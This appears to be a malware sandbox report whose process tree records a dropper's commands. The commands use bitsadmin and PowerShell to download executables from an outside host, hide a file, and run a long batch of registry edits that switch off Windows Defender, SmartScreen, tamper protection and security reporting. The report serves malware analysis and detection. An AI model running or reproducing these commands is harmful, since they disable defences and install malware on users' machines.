PID 592 wrote to memory of 1616	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1616	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1720	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1720	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1720	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 2032	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 2032	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 2032	592	cmd.exe	PING.EXE

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1872 attrib.exe

pid	process
1872	attrib.exe

C:\Users\Admin\AppData\Local\Temp\hgty.bin.exe
"C:\Users\Admin\AppData\Local\Temp\hgty.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2784

C:\Users\Admin\AppData\Local\Temp\is-EBC1H.tmp\hgty.bin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EBC1H.tmp\hgty.bin.tmp" /SL5="$50062,1023751,780800,C:\Users\Admin\AppData\Local\Temp\hgty.bin.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:592

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://xuiklxus.xyz/wlanext32.exe C:\Users\Admin\AppData\Local\Temp\wlanext32.exe
4⤵
- Download via BitsAdmin
PID:3420

C:\Users\Admin\AppData\Local\Temp\wlanext32.exe
wlanext32.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pause
5⤵
PID:2880

C:\Windows\SysWOW64\attrib.exe
ATTRIB +h wlanext32.exe
4⤵
- Views/modifies file attributes
PID:1872

C:\Windows\SysWOW64\PING.EXE
Ping -n 3 127.0.0.1
4⤵
- Runs ping.exe
PID:188

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3500

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1148

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1452

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3676

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3940

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:412

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1040

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2564

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1296

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1468

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1616

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1720

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2032

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2084

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2380

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2648

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2404

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3792

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:632

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1220

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1568

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2400

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3572

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3116

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2220

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1500

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3772

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3424

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3080

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:824

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3492

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2224

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4040

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1664

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:200

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:184

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3192

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:628

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2420

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1304

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3960

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1512

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1784

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2216

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1264

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2336

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1528

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2036

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2244

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3092

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3852

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:324

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1220

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3416

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4076

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3484

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:824

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1604

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1092

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:896

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:628

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1304

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:412

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2564

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1084

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2316

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2060

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2376

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2176

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1032

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3580

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1992

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4064

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3924

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1876

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1452

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2280

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1040

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1348

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1264

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:364

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:972

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2060

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3792

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:324

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3284

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2744

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3580

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:4076

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2232

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:3856

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3228

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1020

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3020

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1608

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1184

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:4040

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1664

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:188

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:3584

C:\Windows\SysWOW64\PING.EXE
Ping -n 3 127.0.0.1
4⤵
- Runs ping.exe
PID:3500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "
3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://xuiklxus.xyz/hfile.bin', 'hfile.bin')"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:364

C:\ProgramData\ConsoleApp\7za.exe
7za.exe x -y -p1234 "*.7z"
4⤵
- Executes dropped EXE
PID:1760

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\ConsoleApp\ControlSet003.vbs"
4⤵
PID:3780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet001.bat" "
5⤵
PID:3160

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
6⤵
PID:1400

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
6⤵
PID:3764

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
6⤵
PID:4064

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
6⤵
PID:3768

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
6⤵
PID:4068

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
6⤵
PID:1020

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
6⤵
PID:3020

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
6⤵
PID:432

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
6⤵
PID:3644

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
6⤵
PID:1676

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
6⤵
PID:1688

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
6⤵
PID:436

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:3584

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
6⤵
PID:3036

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
6⤵
PID:724

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
6⤵
PID:3488

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
6⤵
PID:3944

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:428

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
6⤵
PID:1476

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:2440

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
6⤵
PID:1432

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
6⤵
PID:1208

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
6⤵
PID:1264

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
6⤵
PID:4080

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
6⤵
PID:3560

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
6⤵
PID:3964

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
6⤵
PID:1448

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
6⤵
PID:2004

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
6⤵
PID:1980

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
6⤵
PID:1616

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
6⤵
PID:1044

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
6⤵
PID:2860

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
6⤵
PID:2304

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
6⤵
PID:1764

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
6⤵
PID:3064

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
6⤵
PID:1788

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
6⤵
PID:1220

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
6⤵
PID:3284

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:1516

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
6⤵
PID:3784

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
6⤵
PID:4068

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
6⤵
PID:4056

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
6⤵
PID:1020

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
PID:432

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
6⤵
PID:444

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:1184

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:1676

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
6⤵
PID:3908

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:1688

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
6⤵
PID:660

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:1092

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
6⤵
PID:680

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
6⤵
PID:416

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:2904

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:3100

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
6⤵
PID:1288

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
6⤵
PID:1476

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
6⤵
PID:2496

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
6⤵
PID:1296

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:1208

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:3396

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
6⤵
PID:328

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
6⤵
PID:192

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
6⤵
PID:1928

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
6⤵
PID:3964

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
6⤵
PID:2336

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
6⤵
PID:2172

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
6⤵
PID:3948

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
6⤵
PID:2036

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
6⤵
PID:3084

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:4012

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:3204

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
6⤵
PID:1760

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452

